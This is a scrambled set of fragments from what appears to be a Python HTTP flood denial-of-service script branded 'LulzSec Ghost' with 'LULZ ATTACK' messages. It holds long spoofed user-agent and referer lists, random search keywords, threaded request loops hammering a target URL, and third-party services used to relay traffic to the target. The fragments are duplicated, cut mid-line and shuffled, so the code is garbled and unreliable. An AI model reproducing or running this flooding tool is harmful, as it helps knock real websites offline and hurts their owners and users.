headers_useragents.append('AnswerBus", "2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0", "LOL |: <____|.----|| .---''---, The ;..__..' _... 
Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/':", "request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request)", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6')", "Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0", "libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')", "(www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine", "Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1')", "previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage()", "headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') 
headers_useragents.append('Akregator/1.2.9; librss/remnants')", "Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36", "request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates", "meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0;", "(X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36", "Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta", "'[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print", "Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR", "\\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`.", "headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729;", "def 
keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le", "| | | : \\ `--. ) /|-._: : | \\ \\ /", "Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0", "headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo", "headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot", "|| ' : `.`.) _,' |;._:: | | | | `| : `'", "(Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", ",' \\ /-._; | : : :: ,. . 
,' :: /`-._| |", "headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible;", "headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search", "(Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)')", "en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML,", "code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http", "dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0')", "x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') 
headers_useragents.append('Aplix_SANYO_browser/1.x", "\"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute", "like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,", "libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55", "Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible;", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "; | | | : \\ `--. 
) /|-._: : | \\ \\", "headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail:", "S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple", "(Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5", "(Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') 
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By", "SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;", "10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2;", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET", "headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop", "headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider", "Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;", "native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha", "da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if", "headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr;", "keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') 
keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World", "Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30", "PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1')", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U;", "at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack", "'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . 
_____|\\", "headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI)", "(Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible;", "Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket", "headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0", "http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika", "Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=')", "def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", "~~ _// _// _// ~ _// ~ ~ / / / / /", "params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 
flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1", "Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML,", "headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA;", "/ / / / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~", "en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2;", "and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark", "v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html", "http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search", "headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9", "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36", ": :: ,. . 
,' :: /`-._| | | || ' : `.`.)", "http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/')", "headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla", "Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)')", "keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0", "(PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E", "headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') 
headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT", "V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\"", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4", 
"BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4')", "4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')", "Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U;", "Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')", "Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "\\ // `:`. ,' \\ /-._; | : : :: ,. . 
,'", "Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv)", "headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot')", "headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet", "Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung", "url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1)", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') 
headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=')", "Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de))", "en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows", "headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko)", "(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac", "keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex')", "Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') 
headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7", "#print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def", "(PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1", "(http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling", "keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice", "O_. ; ; : `. 
// // // // ,' / ~~~`.______//____//____//____//_______,'~ //", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=')", "Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson')", "a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by", ": : :: ,. . 
